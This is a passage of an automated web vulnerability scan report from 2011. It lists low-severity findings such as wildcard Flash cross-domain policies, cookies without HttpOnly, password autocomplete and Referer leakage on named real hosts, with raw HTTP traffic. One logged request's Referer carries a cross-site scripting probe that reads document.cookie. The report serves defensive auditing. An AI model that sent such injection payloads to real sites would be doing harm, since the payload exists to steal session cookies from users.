   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.2. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=119
Expires: Sun, 15 May 2011 12:50:26 GMT
Date: Sun, 15 May 2011 12:48:27 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://rockliffe.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rockliffe.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:58:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=DOFBGCODDHACNBJDFNFHDMLA; path=/
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...

6.2. http://support.hotchilli.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.hotchilli.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: support.hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:04:59 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833869;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Set-Cookie: CFTOKEN=71080920;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...

6.3. https://totalcontrol.hotchilli.net/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.cfm HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: http://support.hotchilli.net/
Cache-Control: max-age=0
Origin: http://support.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 56

Submit=Forgot+Your+Password%3F&j_username=1&j_password=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:16 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833928;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Set-Cookie: CFTOKEN=12505786;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...

6.4. http://webchat.rockliffe.com:9090/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webchat.rockliffe.com:9090
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=179611303

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=11dgdq59zmzyr;Path=/
Content-Type: image/x-icon
Last-Modified: Wed, 18 Nov 2009 15:31:39 GMT
Content-Length: 4286
Accept-Ranges: bytes

...... .... .........(... ...@..... ...................................................................................................................................................................
...[SNIP]...

6.5. http://webmail.hotchilli.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webmail.hotchilli.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: webmail.hotchilli.co.uk
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:47:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3679
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDCCBQACBB=PCBANHLDAPJHDHIDIHOHLLJK; path=/
Cache-control: private

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- expresscfg.asp ver. 5.3.11 -->

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- localcfg.asp ver. 5.3.11 -->

<!-- Copyright 1
...[SNIP]...

6.6. http://www.mailsite.com/common/reporterror.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/reporterror.asp?webpage=UserRoomAccessIssue HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/portal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=PBGBGCODMNOOCPBDMDNPCLOJ; path=/
Vary: Accept-Encoding
Content-Length: 1744


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://rockliffe.com/portal/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /portal/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/ HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG; __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmb=179611303; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

7.2. http://support.hotchilli.net/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.hotchilli.net
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:04:59 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833869;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Set-Cookie: CFTOKEN=71080920;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<BR><form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
                               <TABLE
WIDTH="225" BORDER="0" ALIGN="center" CELLPADDING=4 CELLSPACING=1 BGCOLOR="666666" CLASS=TableMiddleHead>
...[SNIP]...
<TD VALIGN="top" CLASS="body"><input name="j_password" id="j_password" type="password" maxlength="15" class="formobjects" /></TD>
...[SNIP]...

7.3. https://totalcontrol.hotchilli.net/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /index.cfm HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: http://support.hotchilli.net/
Cache-Control: max-age=0
Origin: http://support.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 56

Submit=Forgot+Your+Password%3F&j_username=1&j_password=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:16 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833928;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Set-Cookie: CFTOKEN=12505786;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<BR><form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
                               <TABLE
WIDTH="225" BORDER="0" ALIGN="center" CELLPADDING=4 CELLSPACING=1 BGCOLOR="666666" CLASS=TableMiddleHead>
...[SNIP]...
<TD VALIGN="top" CLASS="body"><input name="j_password" id="j_password" type="password" maxlength="15" class="formobjects" /></TD>
...[SNIP]...

7.4. https://totalcontrol.hotchilli.net/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=1 HTTP/1.1
Host: totalcontrol.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://support.hotchilli.net/?220bf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5b133a8cef0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:12:18 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3834080;expires=Tue, 07-May-2041 12:12:18 GMT;path=/
Set-Cookie: CFTOKEN=38063382;expires=Tue, 07-May-2041 12:12:18 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8495

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<BR><form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=1" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
                               <TABLE
WIDTH="225" BORDER="0" ALIGN="center" CELLPADDING=4 CELLSPACING=1 BGCOLOR="666666" CLASS=TableMiddleHead>
...[SNIP]...
<TD VALIGN="top" CLASS="body"><input name="j_password" id="j_password" type="password" maxlength="15" class="formobjects" /></TD>
...[SNIP]...

8. Cookie scoped to parent domain  previous  next
There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


8.1. http://id.google.com/verify/EAAAAAR87q5D244RWAHBaYA4v_w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAAR87q5D244RWAHBaYA4v_w.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAR87q5D244RWAHBaYA4v_w.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=MailSite+Express+%0Aversion+5.3.11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=4rrFVWIKqz5toVKggpmaQfJOJ0ZkGMcqXZ8uS16K4g=PdPRG1fdpmFUJoCN; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=46=SIxFXl-Do7C54Kob7mNzCSIXn4Q-82nQ7PL6feAzWGgBE1y2vorG4BcMyEbm1l34C9wpWmxmuxEecah4Q1rQWZcSVEySpmZMoG3SEfPjUnvrSdMVzPE3gQcbLz7UqJyz

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=m1F73lFDPpRGZqSrEOdNE2JdpeyQ7mR8QK2EVMuvag=6WgzUMQsmx7KxYv_; expires=Mon, 14-Nov-2011 12:47:45 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 12:47:45 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

8.2. http://id.google.com/verify/EAAAAD1pAuvB2zCFOdDDBxDXkiw.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAD1pAuvB2zCFOdDDBxDXkiw.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAD1pAuvB2zCFOdDDBxDXkiw.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=m1F73lFDPpRGZqSrEOdNE2JdpeyQ7mR8QK2EVMuvag=6WgzUMQsmx7KxYv_; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=46=SIxFXl-Do7C54Kob7mNzCSIXn4Q-82nQ7PL6feAzWGgBE1y2vorG4BcMyEbm1l34C9wpWmxmuxEecah4Q1rQWZcSVEySpmZMoG3SEfPjUnvrSdMVzPE3gQcbLz7UqJyz

Response

HTTP/1.1 200 OK
Set-Cookie: NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy; expires=Mon, 14-Nov-2011 12:53:11 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 12:53:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=MailSite+Express+%0Aversion+5.3.11 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=46=SIxFXl-Do7C54Kob7mNzCSIXn4Q-82nQ7PL6feAzWGgBE1y2vorG4BcMyEbm1l34C9wpWmxmuxEecah4Q1rQWZcSVEySpmZMoG3SEfPjUnvrSdMVzPE3gQcbLz7UqJyz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:47:43 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81639

<!doctype html> <head> <title>MailSite Express
version 5.3.11 - Google Search</title> <script>window.google={kEI:"b8vPTevdLcng0QGYrbzgDQ",kEXPI:"17259,23756,24692,24878,24879,25907,27400,28505
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=MailSite+Express+%0Aversion+5.3.11&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HZ9YDR6aLxAJ:ftp://ftp.rockliffe.com/mailsite/5.3.11/release.txt+MailSite+Express+version+5.3.11&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCkQIDAA')">Cached</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HlaxrQzt_ZwJ:ftp://ftp.rockliffe.com/mailsite/5.3.11/imap4.asp-5.3.11.1-HotFixReleaseNotes.htm+MailSite+Express+version+5.3.11&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CC8QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://forum.mailsite.com/printer_friendly_posts.asp?TID=93" class=l onmousedown="return clk(this.href,'','','','3','','0CDEQFjAC')">MailSite Discuss: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BmPJK2vgOUQJ:forum.mailsite.com/printer_friendly_posts.asp%3FTID%3D93+MailSite+Express+version+5.3.11&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BmPJK2vgOUQJ:forum.mailsite.com/printer_friendly_posts.asp%3FTID%3D93+MailSite+Express+version+5.3.11&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com','','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://forum.mailsite.com/printer_friendly_posts.asp?TID=40" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQFjAD')"><em>
...[SNIP]...
